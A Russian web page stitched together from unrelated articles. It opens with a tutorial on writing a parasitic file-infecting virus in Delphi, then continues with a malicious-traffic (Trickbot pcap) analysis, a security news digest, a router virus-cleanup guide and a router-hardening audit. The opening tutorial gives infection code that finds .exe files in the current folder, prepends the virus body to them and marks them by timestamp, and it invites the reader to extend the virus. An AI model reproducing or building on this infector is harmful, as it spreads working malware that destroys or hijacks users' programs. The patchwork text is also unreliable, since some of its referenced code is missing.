Вирус на сетевом оборудовании

Обновлено: 28.03.2024

HLLO- High Level Language Overwrite. Такой вирус перезаписывает программу своим телом. Т.е.
программа уничтожается, а при попытке запуска программы пользователем- запускается вирус и "заражает" дальше.

HLLP- High Level Language Parasitic. Самые продвинутые. Приписывают свое тело к файлу спереди (Первым стартует вирус, затем он восстанавливает программу и запускает ее) или сзади
- тогда в заголовок проги мы пишем jmp near на тело вируса, все-таки запускаясь первыми.

Саму же программу мы можем оставить в неизменном виде, тогда это будет выглядеть так:

MZТело злобного вируса
MZКод программы

Что такое MZ, я думаю, ты догадался 🙂 Это же инициалы твоего любимого Марка Збиковски, которые он скромно определил в сигнатуру exe файла 🙂 А вписал я их сюда только для того, чтобы ты понЯл
- заражение происходит по принципу copy /b virus.exe program.exe, и никаких особых приколов тут нет. Сейчас нет. Но мы их с тобой нафигачим
- будь здоров :). Ну, например: можно первые 512 или больше байт оригинальной программы зашифровать любым известным тебе алгоритмом- XOR/XOR, NOT/NOT, ADD/SUB, тогда это будет выглядеть как:

MZтело злобного вируса
XORed часть ориг. проги
Неизменная часть ориг. проги

В этом случае структура зараженного файла не будет так понятна.
Я не зря тут (в классификации, в смысле) так распинаюсь
- parasitic-алгоритм используют 90% современных вирусов, независимо от их способа распространения. Ладно, идем дальше:

Сетевой вирус. Может быть любым из перечисленных. Отличается тем, что его распространение не
ограничивается одним компом, эта зараза каким-либо способом лезет через инет или локальную сеть на другие машины. Я думаю, ты регулярно выносишь из мыльника 3-4 таких друга
- вот тебе пример сетевого вируса. А уж попав на чужой комп, он заражает файлы произвольным образом, или не заражает ВООБЩЕ.

Макро вирусы, скриптовые вирусы, IRC вирусы. В одну группу я определил их потому, что это вирусы, написанные на языках, встроенных в приложения (MSOffice :)), скриптах (тут рулит твой любимый VBS) и IRC скриптах. Строго говоря, как только в каком-то приложении появляется достаточно мощная (и/или дырявая) скриптовая компонента, на ней тут же начинают писать вирусы 😉 Кстати, макро вирусы очень просты и легко определяются эвристикой.

Дошли 🙂 Давай, запускай дельфи, убивай всякие окошки и вытирай из окна проекта всю чушь. То есть вообще все вытирай 🙂 Мы будем работать только с DPRом, содержащим:

program EVIL_VIRUS;
USES WINDOWS,SYSUTILS;
begin
end;

Логику вируса, я думаю, ты уже понял из классификации- восстанавливаем и запускаем прогу--> ждем завершения ее работы--> стираем "отработавший файл" (забыл сказать- мы НЕ ЛЕЧИМ зараженную прогу, мы переносим оригинальный код в левый файл и запускаем его. ПРИМЕР: Зараженный файл NOTEPAD.EXE. Создаем файл _NOTEPAD.EXE в том же каталоге с оригинальным кодом, и запускаем уже его).--> ищем незараженное файло и заражаем. Это все 🙂 Базовая конструкция вируса выглядит именно так.

Объяви теперь для своего могучего мозга следующие переменные и константы:

VaR VirBuf, ProgBuf, MyBuf : array of char;
SR : TSearchRec;
My,pr : File;
ProgSize,result : integer;
PN,st : String;
si : Tstartupinfo;
p :Tprocessinformation;
infected : boolean;
CONST VirLen: longint= 1000000;

Первой строчкой идут динамические массивы, в которые мы будем писать соответственно тело вируса и программы; В переменную SR запишутся
характеристики найденного файла-кандидата на заражение (надеюсь, ты знаком с процедурами FindFirst и FindNext, потому что дальше будет хуже ;)), My и
Pr - это файл, откуда мы стартовали и левый файл с оригинальным кодом программы (я про него уже писал выше). result- результат работы FindFirst, он должен быть равен нулю,
ProgSize - размер кода программы. Остальное ясно из дальнейшего, кроме
infected - это признак зараженности найденного файла и
VirLen- это длина кода вируса, ее ты узнаешь только после свадьбы. Тьфу, я хотел сказать, после компиляции. Т.е. компилируешь, меняешь значение константы в исходнике и перекомпилируешь.
Кодим далее 🙂 Здесь ты видишь код, ответственный за восстановление и запуск зараженной программы:

Тут все, в принципе просто и понятно, кроме того, зачем я перенес весь зараженный файл в каталог к виндам и что делают строчки с 3 по 5 включительно.
А сделал я это потому, что читать из запущенного файла некомфортно и возможно только с использованием CreateFile и ReadFile WinAPI. Про кодинг на WinAPI я расскажу позднее, сейчас я разберу только основы
- на Delphi.

Строчки эти - преобразование string в pchar народным методом, поскольку мы сейчас боремся за каждый байт кода. Еще момент: я поступил некорректно, задав путь c:\windows так жестко. Пользуйся лучше процедурой GetWindowsDirectory, узнай точно 🙂 Все остальное понятно без всяких комментариев (если нет
завязывай прогуливать информатику ;)), идем дальше:

result:= FindFirst ('*.exe',faAnyFile,sr);
WHILE Result= 0 DO
begin
//Проверка на вшивость
Infected:= false;
IF DateTimeToStr (FileDateToDateTime (fileage (sr.name)))= '03.08.98 06:00:00' then infected:= true;
//Проверено!
IF (infected= false)and (sr.name<>paramstr(0)) then
begin
AssignFile (my,sr.Name);
ReWrite (my);
BlockWrite (my,virbuf,virlen);
BlockWrite (my,progbuf,sr.Size);
CloseFile (my);
FileSetDate (sr.Name,DateTimeToFileDate(StrToDateTime ('03.08.98 06:00:00')));
end;
end;

//Если вир запущен "чистым", т.е. не из зараженной про-граммы, то завершаемся
end else halt;

Что же твой зоркий глаз видит тут? Правильно, процедура FindFirst ищет нам заданную жертву (любой exe файл из текущего каталога), передает его характеристики в переменную SR. Затем необходимо его проверить на зараженность. Это делается оригинально: при заражении файлу присваивается опр. дата и время. И любой файл с такими характеристиками считается зараженным. Все остальное опять же нецензурно просто, поэтому я плавно перехожу к заключению 🙂

Вот мы и накодили наш первый вирус. Пока он умеет только заражать файлы в текущем каталоге (хотя, я уверен, ты его легко модернизируешь ;)) и ничего не знает про другие каталоги и интернет. Не отчаивайся, мы его этому быстро обучим. Пока поиграйся с этими строчками, и жди следующей статьи.

Рискну дать тебе описание всех процедур, использованных в статье. Это поможет тебе искать их в хелпе и подготовиться к кодингу серьезных вирусов с использованием
WinAPI.

AssignFile - в WinAPI нет аналога - сопоставляет файл
с переменной типа File или TextFile

Reset - аналоги _lopen и CreateFile - открывает
существующий файл и устанавливает позицию
чтения в начало

ReWrite - _lcreate и CreateFile - создает новый файл и
уст. позицию чтения в начало. Если скормить
ReWrite существующий файл, его содержимое
будет обнулено

BlockRead - _lread и ReadFile - читает в буфер
определенное количество данных из файла

BlockWrite - _lwrite и WriteFile - соответственно, пишет
данные в файл

SeekFile - _llseek и SetFilePointer - перемещает позицию
чтения/записи в открытом файле

Статья расскажет о способах разбора и детектирования вредоносного сетевого взаимодействия в сети. Информация предоставляется для ознакомления. Здесь будут рассмотрены основные инструменты для анализа сетевого трафика и рассмотрены источники примеров для практики.

Анализ сетевого взаимодействия

Что в большинстве случаев генерирует в сети вредоносное программное обеспечение:

отчет о инфицировании системы;

собранные в системе учетные данные;

принимаемые команды от управляющего сервера;

загружаемые модули обновления вредоноса;

сетевой трафик, который используется для атак DDoS

Для обнаружения вредоносного сетевого взаимодействия нужно:

Иметь возможность записывать фрагменты сетевого взаимодействия;

Знать основные шаблоны передачи зловредами данных по сети и способы сокрытия информации в сетевом взаимодействии.

Первый пункт решить достаточно просто с помощью снифферов типа WireShark или tcpdump . Второй пункт решается для начинающих аналитиков только большим количеством проанализированных фрагментов трафиков. Где найти такие фрагменты?

Готовые наборы вредоносного сетевого взаимодействия можно найти просто загуглив "malicious pcap". Неплохая подборка есть вот здесь. На первых порах лучше использовать этот трафик для понимания, как именно зловредное программное обеспечение может передавать информацию по сети. На ресурсе можно также обнаружить раздел с записанными сетевыми взаимодействиями, которые были созданы для того, чтобы научиться исследовать трафик. Попробуем проанализировать записанный трафик вредоносного программного обеспечения.

ВНИМАНИЕ: Никакие файлы и команды, найденные в записанном сетевом взаимодействии, нельзя запускать на вашей рабочей машине — анализировать эти данные нужно в виртуальной машине.

Выбранный файл сетевого взаимодействия представляет собой сетевую активность вредоносного программного обеспечения Trickbot. Так как мы не знаем, как построена сеть, где было записано сетевое взаимодействие, то выясним, какие машины вообще взаимодействуют в сети:


Всего 24 машины, достаточно много, попробуем выяснить, какие там используются протоколы:


По списку можно увидеть, что в сети используется операционная система Windows, работающая в инфраструктуре под управлением Windows AD. Поищем вредоносные сетевые взаимодействия. Обычно изучение начинается с просмотра количества информации, которая передается в рамках взаимодействия сетевых машин:


Интересным выглядит взаимодействие с ip адресом, который начинается с 149.28. Создадим фильтр:

В итоге видим такую картину:


Похоже, что на машине был открыт документ, который подгружает файл шаблона для документа MS Office. Далее находится обфусцированный скрипт на VBA:


Очевидно, что в записанное взаимодействие попал этап инфицирования ОС вредоносным программным обеспечением. Если взглянуть на вот такой фильтр:


Обнаруживаем, что сетевое взаимодействие зловреда также зашифровано. Что же делать? Ключей шифрования нет, прочесть информацию внутри пакетов не получится.

Анализ сетевого взаимодействия: сегодня и в будущем

Любые навыки анализа сетевого взаимодействия разбиваются об использование шифрования трафика. Современным стандартом шифрования в сети на прикладном уровне модели OSI является использование HTTP over TLS. Зачастую это "Game Over" любого анализа, если недоступны ключи шифрования. Как же поступить в этом случае?

Этим вопросом задаются достаточно давно. Были найдены общие подходы, которые в совокупности с контекстом сетевого взаимодействия (программное обеспечение хоста, роли машин в локальной сети) могут позволить обнаружить вредоносное сетевое взаимодействие даже без его расшифрования.

Любопытный проект можно найти здесь. Проект использует в качестве инструмента для анализа зашифрованных трафиков нейронные сети. Именно они могут позволить классифицировать преобразованные взаимодействия.

Классификация осуществляется на базе следующих данных:

длины передаваемых данных

временных таймаутов между отправкой данных

Заключение

Читал эту новость и не мог избавиться от дежа вю. Где-то это уже было… А!

Tyrell: Is this to be an empathy test? Capillary dilation of the so-called blush response? Fluctuation of the pupil. Involuntary dilation of the iris…
Deckard: We call it Voight-Kampff for short.

Аааа! В фильме и книге люди тестами выявляли роботов, а тут роботы будут отличать людей друг от друга. Но принцип тот же! Будущее наступило. Билли, где моя электрическая овца? Светлое будущее кажется окончательно лишит нас прямого контроля над собственными устройствами, как уже лишило контроля над данными. Эта и другие инсинуации под катом.
Все выпуски дайджеста – тут.

В общих чертах проект Abacus был анонсирован Google на прошлогодней конференции Google I/O, а недавно на том же мероприятии объявили, что технология будет доступна для пользователей уже в конце этого года. Abacus основан на изучении упомянутых выше повадок (включаю голос Дроздова) пользователя для выставления некоего Trust Score. Как только поведение пользователя меняется, Trust Score резко падает, и в определенный момент устройство блокируется. Trust Score, кстати, планируется хранить непосредственно на устройстве, на серверы Google он передаваться не будет. Похожую позицию касательно сбора биометрических данных занимает Apple.

Надо ли вообще хоронить пароли? Пожалуй да, уже пора. Все прошлая неделя практически полностью состояла из новостей про утечки паролей, пользователи по-прежнему защищают свои данные надежными комбинациями а-ля 123321, а компании регулярно эти пароли теряют. Менеджерами паролей пользуется на так много людей, как хотелось бы. Время пришло. Вообще пароли можно назвать представителями компьютерного олдскула: это такой же пережиток прошлого, как например полное доверие между компьютерами внутри одной локальной сети. Можно пойти еще дальше и отнести пароли к уходящей эпохе старого подхода к программированию электронных вычислительных машин.


Недавно в Wired была опубликована статья как раз об этом. Программирование, как мы сейчас его понимаем, все целиком будет объявлено низкоуровневым, а кодеры будущего скорее займутся тренировкой своих самообучаемых машин с последующей репликацией результатов. Ну как с собаками. Можете называть это пришиванием белыми нитками, но я вижу явную связь между развитием темы машинного обучения и подходом Google к безопасности.

Прошлогодняя уязвимость в Microsoft Office используется минимум шестью группировками для таргетированных атак
Новость. Исследование.

Уязвимость, закрытая апдейтом MS15-099, затрагивает версии Office c 2007 по 2013 и позволяет выполнить произвольный код, если заставить пользователя открыть подготовленное изображение в формате EPS. Летом прошлого года ситуация с этой дырой пошла по плохому сценарию: реальные атаки были обнаружены еще в августе, до выпуска патча. Как видно, и патч не сильно помог. В числе жертв — множество компаний и госструктур в Азии. Эксплойт использовался минимум шестью разными группировками, из них четыре действуют и поныне. Как обычно, все начинается с весьма правдоподобного фишингового письма.


Вирус атакует сетевые устройства Ubiquiti
Новость.

Проблема в том, что уязвимость затрагивает версии AirOS 5.6.2 и более ранние, и вообще-то была закрыта год назад. Не все смогли за это время обновить прошивки своих устройств. Почему я не удивлен? Пожалуй из всех потенциально уязвимых точек инфраструктуры сетевые устройства представляют наибольшую опасность в случае взлома: это по сути ключи от огороженного периметра. Представители вендора впрочем утверждают, что атакованных устройств было немного и предоставляют пострадавшим утилиту для приведения сетевой аппаратуры в чувство.

Что еще произошло:
TeslaCrypt — всё. Авторы одного из наиболее заметных криптолокеров извинились и опубликовали мастер-ключ для расшифровки данных.

История со взломом финансовой сети SWIFT продолжается. Помимо центробанка Бангладеш пострадала финансовая организация в Эквадоре. Представители SWIFT, в свою очередь, перестали делать вид, что их это не касается, и начали делиться информацией об атаках, хотя и в закрытом виде.

Обнаруженный совсем недавно зиродей в Adobe Flash уже взят на вооружение тремя эксплойт-паками.

Во время раздачи интернета по Wi-Fi через роутер могут появляться различные проблемы. Например, торможения и высокий пинг могут происходить из-за заражения раздающего оборудования вирусами. Рассмотрим подробнее, как почистить роутер самостоятельно.

Симптомы

Как проверить роутер на вирусы и почистить его: наши советы

Оборудование может быть заражено следующими типами вирусов:

  • замедляющими скорость передачи данных. К примеру, вирус способен сбивать настройки, будет низкая скорость, потеря сигнала и т. п.;
  • подменяющими адреса сайтов. Происходит это так: человек переходит на ресурс, а вредоносная программа меняет DNS, и пользователь перенаправляется на сайт с рекламой или ему становятся видны рекламные блоки, которые разместили владельцы сайтов. Данный вирус является опасным еще и по той причине, что он способен перенаправлять на ресурс, в котором содержится другой вредоносный контент.

Как проверить роутер на вирусы и почистить его: наши советы

Во всяком случае при нестабильной работе роутера необходимо провести его проверку на вирусы, убрать которые достаточно легко.

Как происходит заражение?

Маршрутизатор раздает интернет всем гаджетам, подключаемым к нему. Это означает, что все устройства действуют в одной локальной сети. Вирус использует это: он проникает в компьютер через сайт или загруженный файл, далее по сети попадает в роутер, в котором производит вредоносные действия.

Серьезность ситуации зависит от версии вирусной программы, к примеру, некоторые вредители ведут себя скрытно и начинают активно действовать, только оказавшись в роутере, другие наоборот, могут попутно повредить и операционную систему.

Проверка сетевого оборудования на заражение

Перед очисткой оборудования от вирусов, необходимо проверить роутер на их наличие. Чтобы это сделать, нужно подключить интернет-кабель к порту компьютера напрямую. Вытащить провод WLAN из маршрутизатора и подсоединить его к компьютеру, а далее произвести такие манипуляции:

  • Запустите браузер и пооткрывайте несколько сайтов. Удостоверьтесь в их правильном содержании и отсутствии подмены сайтов, рекламных блоков. С целью проверки лучше выбирать ресурсы, в которых присутствия рекламы не может быть.
  • Запустите сканирование компьютера антивирусной программой. Это нужно, чтобы определить путь заражения – от компьютера или с маршрутизатора. Имейте ввиду, что вирусов может быть несколько, и они могут присутствовать как в системе, так и в сетевом оборудовании.

Как проверить роутер на вирусы и почистить его: наши советы

Удаление вируса

Видео про заражение роутера вирусами смотрите тут:

Для удаления вредоносной программы, нужно сбросить настройки до первоначальных. В случае, если вирусная программа уже нанесла вред прошивке, ее будет необходимо поставить заново.

Сброс параметров

Чтобы почистить маршрутизатор, нужно сбросить его настройки:

  • В задней части устройства найдите кнопку Reset. Зачастую она выделяется на фоне других. Зажмите ее и держите до того момента, когда роутер сбросит параметры и будет перезагружаться. Помните, что при перезагрузке все настройки слетят, а маршрутизатор нужно будет настроить заново.

Как проверить роутер на вирусы и почистить его: наши советы

  • Для настройки роутера необходимо с помощью кабеля подсоединить его к компьютеру, далее запустить браузер и набрать адрес 192.168.0.1. Он может быть другим и указывается на самом роутере или в документах к нему, в инструкции. При входе в настройки зачастую вводят логин admin, а пароль такой же или 12345. Если войти не получилось, то стоит заглянуть в инструкцию к сетевому оборудованию.

Как проверить роутер на вирусы и почистить его: наши советы

  • Найдите параметры быстрой настройки. Выберите все подходящие пункты. Также можете сменить пароль и наименование сети. Осуществив процесс настройки, сохраните их и перезагрузите маршрутизатор.

Как проверить роутер на вирусы и почистить его: наши советы

Проделав все описанные действия, проверьте, удалось ли избавиться от проблемы. Если не получилось, то понадобится перепрошивка сетевого оборудования.

Как выполнить перепрошивку?

Бывает, что вирусная программа изменяет прошивку на роутере. Нейтрализовать зараженную версию можно с помощью перепрошивки.

Подсоедините компьютер к маршрутизатору через LAN провод. Он должен быть в комплекте к любому роутеру. Если его нет, то можно использовать Wi-Fi соединение. Однако, кабельный способ подключения будет предпочтительнее.

Как проверить роутер на вирусы и почистить его: наши советы

После присоединения к маршрутизатору запускаем браузер и вписываем в адресное поле значение 192.168.1.1 (или другой, указанный на самом устройстве), далее потребуется ввести пароль и логин для открытия настроек роутера. По умолчанию логин и пароль – admin. Если зайти в настройки не получается, то необходимо узнать действующие реквизиты для входа, возможно после последней установки их сменили.

Загрузите новую версию прошивки с сайта производителя и, перейдя в настройки маршрутизатора, выберите ее на диске компьютера. Процесс прошивки для всех роутеров идентичен.

Защита сетевого оборудования от вирусов

Для защиты своего маршрутизатора от заражения можно воспользоваться следующими рекомендациями:

  • Сделать обновление прошивки до последней версии. Посетите сайт изготовителя, впишите в поиск свою модель и загрузите самую последнюю прошивку.
  • Установить многозначное значение пароля на веб-интерфейс. Не во всех роутерах можно менять логин. Однако, если вы поставите сложный пароль, взломать веб-интерфейс уже будет непросто.
  • Установить оффлайн вход в настройки роутера.
  • Поменять IP-адрес маршрутизатора в локальном доступе. В процессе взлома вирус сразу будет обращаться к таким адресам, как 192.168.0.1 и 192.168.1.1. Исходя из этого, лучше поменять третий и четвертый октет IP-адреса локальной сети.
  • Поставить надежную антивирусную программу на ПК. Если вирус сперва попытается проникнуть в компьютер, он будет сразу удален, что не позволит ему нанести вред маршрутизатору.
  • Не храните пароли в браузере.

Как проверить роутер на вирусы и почистить его: наши советы

Как видите, проверить роутер на вирусы и почистить его несложно. Но лучше следовать простым советам по профилактике заражения. Но если уж такое случилось, вы знаете, что нужно делать.

Производители роутеров зачастую не слишком заботятся о качестве кода, поэтому и уязвимости нередки. Сегодня роутеры — приоритетная цель сетевых атак, позволяющая украсть деньги и данные в обход локальных систем защиты. Как самому проверить качество прошивки и адекватность настроек? В этом помогут бесплатные утилиты, сервисы онлайн-проверки и эта статья.

Через уязвимую реализацию CWMP злоумышленник может делать практически что угодно: задавать и считывать параметры конфигурации, сбрасывать установки на значения по умолчанию и удаленно перезагружать устройство. Самый распространенный тип атаки заключается в подмене адресов DNS в настройках роутера на подконтрольные взломщику серверы. Они фильтруют веб-запросы и перенаправляют на поддельные страницы те из них, которые содержат обращение к банковским сервисам. Фейковые страницы создавались для всех популярных платежных систем: PayPal, Visa, MasterCard, QIWI и других.

Особенность такой атаки состоит в том, что браузер работает в чистой ОС и отправляет запрос на корректно введенный адрес реальной платежной системы. Проверка сетевых настроек компьютера и поиск вирусов на нем не выявляют никаких проблем. Более того, эффект сохраняется, если подключиться к платежной системе через взломанный роутер из другого браузера и даже с другого устройства в домашней сети.

Поскольку большинство людей редко проверяют настройки роутера (или вовсе доверяют этот процесс техникам провайдера), проблема долго остается незамеченной. Узнают о ней обычно методом исключения — уже после того, как деньги были украдены со счетов, а проверка компьютера ничего не дала.

На скриншоте показателен только положительный результат. Отрицательный еще не гарантирует, что уязвимости нет. Чтобы ее исключить, потребуется провести полноценный тест на проникновение — например, с использованием сканера Nexpose или фреймворка Metasploit. Разработчики часто сами не готовы сказать, какая версия RomPager используется в конкретном релизе их прошивки и есть ли она там вообще. Этого компонента точно нет только в альтернативных прошивках с открытыми исходниками (речь о них пойдет дальше).

Прописываем защищенный DNS

Хорошая идея — почаще проверять настройки роутера и сразу прописать руками альтернативные адреса серверов DNS. Вот некоторые из них, доступные бесплатно.

  • Comodo Secure DNS: 8.26.56.26 и 8.20.247.20
  • Norton ConnectSafe: 199.85.126.10, 199.85.127.10
  • Google Public DNS: 8.8.8.8, 2001:4860:4860:8888 — для IPv6
  • OpenDNS: 208.67.222.222, 208.67.220.220

Unplug and pray

Проверка известных троянских портов

Проверка известных троянских портов


Другие статьи в выпуске:

Еще один способ выполнить бесплатный аудит домашней сети — скачать и запустить антивирус Avast. Его новые версии содержат мастер проверки Network check, который определяет известные уязвимости и опасные сетевые настройки.

Avast не нашел проблем, но радоваться еще рано

Avast не нашел проблем, но радоваться еще рано

Умолчания — для ягнят

Service, service, откройся!

Service, service, откройся!

Сверхскопление массивных дыр

Отключаем WPS

Беда редко приходит одна: активация WPS автоматически приводит к включению UPnP. Вдобавок используемый в WPS стандартный пин-код или ключ предварительной аутентификации сводит на нет всю криптографическую защиту уровня WPA2-PSK. Из-за ошибок в прошивке WPS часто остается включен даже после его отключения через веб-интерфейс. Узнать об этом можно с помощью Wi-Fi-сканера — например, бесплатного приложения Wifi Analyzer для смартфонов с ОС Android. Если уязвимые сервисы используются самим администратором, то отказаться от них не получится. Хорошо, если роутер позволяет хоть как-то их обезопасить. Например, не принимать команды на порт WAN или задать конкретный IP-адрес для использования Telnet. Иногда возможности настроить или просто отключить опасный сервис в веб-интерфейсе просто нет и закрыть дыру стандартными средствами невозможно. Единственный выход в этом случае — искать новую или альтернативную прошивку с расширенным набором функций.

Альтернативные службы

Наиболее популярными открытыми прошивками стали DD-WRT, OpenWRT и ее форк Gargoyle. Установить их можно только на маршрутизаторы из списка поддерживаемых — то есть тех, для которых производитель чипсета раскрыл полные спецификации. Например, у Asus есть отдельная серия роутеров, изначально разработанная с прицелом на использование DD-WRT (bit.ly/1xfIUSf). Она уже насчитывает двенадцать моделей от начального до корпоративного уровня. Роутеры MikroTik работают под управлением RouterOS, не уступающей по гибкости настроек семейству *WRT. Это тоже полноценная сетевая ОС на ядре Linux, которая поддерживает абсолютно все сервисы и любые мыслимые конфигурации. Альтернативные прошивки сегодня можно установить на многие роутеры, но будь внимателен и проверяй полное название устройства. При одинаковом номере модели и внешнем виде у маршрутизаторов могут быть разные ревизии, за которыми могут скрываться совершенно разные аппаратные платформы.

Проверка защиты

Проверку на уязвимость OpenSSL можно выполнить бесплатной утилитой ScanNow фирмы Rapid7 (bit.ly/18g9TSf) или ее упрощенной онлайновой версией (bit.ly/1xhVhrM). В онлайне проверка проходит за несколько секунд. В отдельной программе можно задать диапазон IP-адресов, поэтому тест длится дольше. Кстати, регистрационные поля утилиты ScanNow никак не проверяются.

Запросы UPnP роутером проигнорированы

Запросы UPnP роутером проигнорированы

После проверки отобразится отчет и предложение попробовать более продвинутый сканер уязвимостей Nexpose, ориентированный на сети компаний. Он доступен для Windows, Linux и VMware. В зависимости от версии бесплатный испытательный период лимитируется сроком от 7 до 14 дней. Ограничения касаются количества IP-адресов и областей проверки.

Результаты проверки ScanNow и реклама более продвинутого сканера

Результаты проверки ScanNow и реклама более продвинутого сканера

К сожалению, установка альтернативной опенсорсной прошивки — это лишь способ повысить защиту, и полной безопасности он не даст. Все прошивки построены по модульному принципу и сочетают в себе ряд ключевых компонентов. Когда в них обнаруживается проблема, она затрагивает миллионы устройств. Например, уязвимость в открытой библиотеке OpenSSL коснулась и роутеров с *WRT. Ее криптографические функции использовались для шифрования сеансов удаленного доступа по SSH, организации VPN, управления локальным веб-сервером и других популярных задач. Производители начали выпускать обновления довольно быстро, но устранить проблему полностью до сих пор не удается.

Новые уязвимости в роутерах находятся постоянно, и какими-то из них успевают воспользоваться еще до того, как выйдет исправление. Все, что может сделать владелец маршрутизатора, — это отключить лишние сервисы, сменить дефолтные параметры, ограничить удаленное управление, почаще проверять настройки и обновлять прошивку.

Читайте также: